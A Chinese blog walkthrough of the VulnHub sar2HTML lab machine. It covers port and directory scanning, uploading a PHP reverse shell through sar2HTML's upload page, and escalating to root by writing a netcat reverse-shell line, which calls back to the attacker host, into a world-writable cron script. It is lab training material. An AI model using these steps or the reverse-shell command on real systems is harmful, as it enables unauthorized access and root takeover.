靶场练习(2):sar2HTML

已于 2024-09-10 12:05:58 修改
阅读量318 收藏 5
点赞数 4
分类专栏: vulnhub靶场练习 文章标签: 网络安全 web安全
于 2024-09-10 12:01:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dcy1124/article/details/142093538
版权

靶机ip:172.16.33.13

突破

端口扫描

sudo nmap -p- 172.16.33.13 --open

结果如下:

在这里插入图片描述

特定端口扫描

sudo nmap -p80 -sV -A 172.16.33.13

结果如下:
在这里插入图片描述

针对80端口

对其进行路径扫描:

dirsearch -u http://172.16.33.13

结果如下:

在这里插入图片描述

对其进行文件扫描:

dirsearch -u http://172.16.33.13 -f -e txt,php,html.pdf

结果如下:

在这里插入图片描述

进入http://172.16.33.13/robots.txt,发现关键路径sar2HTML:

在这里插入图片描述

进入http://172.16.33.13/sar2HTML,发现新系统:

在这里插入图片描述

点击“New”后,发现一个文件上传功能,试试上传一个反弹php脚本,点击“Upload report”后再点击“Go to Plotting Page”,跳转界面后随便点击几个选项之后点击“Plot”,发现“sarDATA”关键路径:

在这里插入图片描述
在这里插入图片描述

访问http://172.16.33.13/sar2HTML/sarDATA,发现路径uPLOAD/

在这里插入图片描述

点击进入后发现刚才上传的php反弹脚本,kali本地端做好监听,点击运行脚本,突破成功。

在这里插入图片描述

nc -nvlp 1234

在这里插入图片描述

提权

升级终端

/usr/bin/script -qc /bin/bash /dev/null

通过root周期执行的文件进行提权

查看是否有root周期执行的文件:

cat /etc/crontab

结果如下,发现finally.sh:

在这里插入图片描述

查看finally.sh的权限,发现它仅允许root用户进行写操作

在这里插入图片描述

查看其内容发现是运行write.sh脚本,而write.sh其他用户是可写的

在这里插入图片描述

将sh脚本写入其中,本地端做好两个端口的监听

#!/bin/sh
nc <kali本地ip> 1234 | /bin/bash | nc <kali本地ip> 2345

反弹成功,查看id:

在这里插入图片描述

提权成功,打靶完成。

bebabong
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
高通SDX12:sar sensor AW9610x驱动移植
Gabriel.Tian的博客
06-08 1380
高通SDX12 sar sensor AW9610x
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2132
前言 这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
-bash: sar: 未找到命令
bang152101的博客
04-24 3548
直接安装sysstat即可:yum -y install sysstat [root@bogon ~]# sar -n DEV 1 2 | grep 'enp2s0f1' | grep -v grep -bash: sar: 未找到命令 [root@bogon ~]# yum install sar 已加载插件:fastestmirror Loading mirror speeds from c...
【ARM微型电脑/IoT设备/嵌入式】树莓派安装失败sysstat,成功后还是无法使用sar,并报错:-bash:sar:command not found
点赞的都能无bug通过!
11-15 1412
这主要是由于不完全安装导致的。解决方式是删除或编辑安装信息文件。删除所有信息之后update执行完以上代码后再用安装。
SAR成像2:方位高分辨
Brice的博客
07-04 1510
假设:载体平台平稳地以匀速直线速度V直线飞行不考虑载机高度,即在场景平面形成的阵列为均匀线阵,而雷达以一定的重复周期Tr发射脉冲,于是在飞行过程中在空间形成了间隔为d=VTr的均匀直线阵列,而达依次接收到的序列数据即相应顺序阵元的信号。 快时间信号:雷达接收到的回波信号。慢时间信号:雷达天线(即合成阵列的阵元)相位中心所处的位置 模型如下: 图 “一步一停”工作模式示意图 设载机在X−Y平面内沿X轴飞行,目标为沿与X轴平行而垂直距 离为Rs直线上分布的一系列点目标,其X方...
经典指标:SAR算法和应用
热门推荐
四纪启悟 · 数据科学
10-29 1万+
经典指标:SAR算法和应用   SAR又叫抛物线转向指标,是一种经典的判断股市转势和顶底的指标。以下我们来看下SAR指标的算法和应用,看下这种经典指标是怎么指示买卖点以及市场情况的。   假设参数为(N,2,20)   首先要确定是涨势还是跌势,并且得出起算点。有多种不同的确定方法,这里略过。   一、涨势中算法   1.涨势中第一步,假设时间段是t   那SAR(t)等于前面N个时间
linux性能监控工具sar,详细介绍Linux下的监控工具:sar命令
weixin_36084130的博客
05-04 1415
我决定把今年装x的机会,留给sar命令。它是一个Linux下的监控工具,一直站在鄙视链的顶端。之所以让人望而生畏,主要是由于它繁多的参数。但,这么强大的命令,并非无章可循,实际上是非常简单的。sar命令很简单,它的参数主要分为四部分。其中,第二部分和第三、四部分,是可选的,也就是说,最终要的参数,就剩下一个,那就是类型。这个参数的值非常的多,我们暂且放在一边,看一下以上命令的简单意义。类型,也就是...
SAR ADC系列2:DFT离散傅里叶变换
qq_41545745的博客
03-28 3713
简单介绍了ADC分析的DFT or FFT (傅里叶变换),将时域分析转换为频域进行分析,并给出了在 Cadence 和 Matlab 上实现DFT的实例。
SAR ADC系列23:SAR逻辑(同步SAR逻辑 & 异步SAR逻辑)
qq_41545745的博客
04-11 8964
sar逻辑
vulnhub Sar: 1
箭雨镜屋
05-04 1260
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
sar成像matlab代码-SAR-coregistration-repl:SAR-注册-repl
06-03
SAR/SAR 配准,然后用于其他遥感图像配准,包括异构图像配准(例如 LIDAR/SAR、光学/ SAR、高光谱/光学等) 我们希望此代码会有所帮助,我们将继续为您服务,我们有兴趣回复您的评论。 {ge ,e, _}Folki 算法的引用:...
SAR-PROCESSING:SAR图像处理算法
04-02
SAR处理 处理SAR图像的功能。 这些功能允许通过分解为脚本的分解查看大型SAR图像。 要运行脚本,您需要使用读取功能将图像加载到内存中,输入行和列编号,可以在图像随附的.ann文件中找到。 图像可以二进制格式从...
matlab三维图像代码-sar:SAR成像的自动聚焦和图像处理算法
05-20
该存储库包含用于SAR图像处理和自动聚焦算法的所有源代码。 有关详细信息,请参阅每个子目录的README 。 data_collection 所有用于实时收集雷达数据的程序。 2d_autofocus 与3d_autofocus类似,但仅适用于二维光圈。...
sar成像matlab代码-MyAirportSaliency:SAR图像中机场检测的多层抽象显着性
06-03
SAR 图像中的机场检测”的简单演示 用法 下载OpenCV 3.2.0 ,将 DLL 文件opencv\build\x64\vc14\bin\opencv_world320.dll到utils\文件夹。 运行Demo.m 。 引文 @article{liu2019multi, title={Multi-Layer ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1647
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Web安全之SQL注入:如何预防及解决
最新发布
J老熊
09-07 1387
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 962
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1783
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值